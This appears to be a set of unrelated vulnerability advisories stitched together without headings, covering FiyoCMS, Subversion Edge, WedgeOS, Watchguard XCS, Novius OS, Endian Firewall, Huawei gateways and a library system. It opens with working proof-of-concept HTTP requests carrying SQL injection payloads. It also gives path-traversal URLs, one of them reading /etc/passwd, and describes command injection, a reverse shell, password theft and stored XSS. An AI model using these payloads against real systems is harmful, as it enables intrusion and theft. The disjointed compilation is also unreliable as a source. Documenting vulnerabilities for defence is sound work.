The vulnerable file is /apps/app_article/controller/rating.php. Because rating.php includes jscore.php, a Referer header must be added to the HTTP request to bypass the authorization check. When 'do' equals 'rate', the same vulnerability applies.

POC (HTTP request):

POST //fiyocms/apps/app_article/controller/rating.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost:80/fiyocms/
Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; PHPSESSID=nl1e3jdfd8i7flnhffp37ro2s3
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

do=getrate&id=182;select sleep(5) --

POC (HTTP request):

POST /fiyocms/user/login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; PHPSESSID=4gl29hsns650jqj5toakt044h0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

username=admin' and sleep(5) -- &password=admin
The CollabNet Subversion Edge Management Frontend allows authenticated admins to read arbitrary local files via the "fileName" parameter of the log "tail" action. Sample URL: https://example.com:4434/csvn/log/tail?fileName=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&startIndex=0
Wedge Networks WedgeOS Virtual Appliance contains a number of security vulnerabilities, including unauthenticated arbitrary file read as root, command injection in the web interface, privilege escalation to root, and command execution via the system update functionality.

Arbitrary file read: Any user with access to the web interface of WedgeOS may submit a GET request to the ssgimages function, using directory traversal to specify an arbitrary file on disk. The web server runs as root, so any file may be read, including the shadow file. This vulnerability can be used to read the contents of the local MySQL database, which contains MD5 password hashes for the web interface.

Command injection: Any authenticated user may execute arbitrary commands as root. The ping, nslookup, and traceroute functions of the diagnostic interface fail to validate user input correctly, which allows the injection of arbitrary system commands. Bash brace expansion can be used to execute more syntactically complex commands.

Privilege escalation: The web server runs as root, but the web application is run as the unprivileged user 'ssguser'. The web application is vulnerable to command injection, which can be used to escalate privileges to root.

System update: The system update functionality of WedgeOS allows an authenticated user to execute arbitrary commands as root. The update process is unauthenticated, and the update package is not cryptographically verified.
The Watchguard XCS virtual appliance contains a number of vulnerabilities, including unauthenticated SQL injection, command execution and privilege escalation. By combining these vulnerabilities, an attacker may remotely obtain root privileges on the underlying host. Unauthenticated SQL injection is possible through the "sid" cookie parameter in the Watchguard XCS web interface, because a PHP script insecurely constructs an SQL query using that value. Stacked queries are possible, and allow insertion of a backdoor web interface user into the database. The web interface of XCS contains a number of command injection vulnerabilities. These can be used to execute arbitrary commands as the apache user.
Users can inject XSS payloads that are saved to the MySQL DB, where they execute each time the stored value is accessed.

1- In Admin, under 'Media Center', users can inject XSS payloads into the 'media_title' field of a saved media file: create a new media page, inject the payload, click save, and then select visualize.

2- Under the Website menus area, users can inject XSS payloads into the 'menu_title' field of a Website menu and save them.

Directory traversal: files outside of the current working directory can be accessed and read in the Admin area by abusing the 'tab' parameter: http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../../

Open redirect: http://localhost/novius-os.5.0.1-elche/novius-os/admin/nos/login?redirect= is open to abuse by supplying a malicious location or file.
This exploit allows an attacker to inject a reverse TCP shell into the Endian Firewall Proxy User Password Change page (/cgi-bin/chpasswd.cgi). The attacker must have knowledge of a valid proxy username and password on the target Endian Firewall. The exploit works by sending a maliciously crafted POST request to the chpasswd.cgi page, which contains a command injection payload. This payload will execute a reverse TCP shell to the attacker's specified IP and port.
A vulnerability in Huawei Home Gateway allows an attacker to change the password of the device without authentication. This vulnerability exists due to improper validation of the SOAP request sent to the device. An attacker can exploit this vulnerability by sending a specially crafted SOAP request to the device.
This exploit allows an attacker to gain access to the password of a Huawei Home Gateway device. The exploit sends a SOAP request to the device on port 80, and the response contains the password of the device. The exploit was tested on the HG530 and HG520b devices provided by TE-DATA Egypt.
The identified vulnerability (stored Cross-Site Scripting) allows the execution of JavaScript code in the browser of a valid user when they toggle the password mask on a specially crafted password. This allows, for example, an attacker to prepare a specially crafted shared password which, when read by another user, can steal all other passwords the victim has access to.
The attack can be performed through a compromised user account (for example, after retrieving the password of a student user account through SQLi, CVE-2015-4633) or by a user who clicks on a malicious link (for example in a phishing mail, forum link, etc.). An attacker may escalate privileges and even gain superlibrarian permissions. An attacker may target other users by stealing session tokens, impersonating them, or exploiting browser vulnerabilities to gain access to their machines. An attacker may also perform unauthorized actions with the permissions of a staff member, and exploit other known server-side vulnerabilities (see CVE-2015-4633 and CVE-2015-4632) to fully compromise the webserver.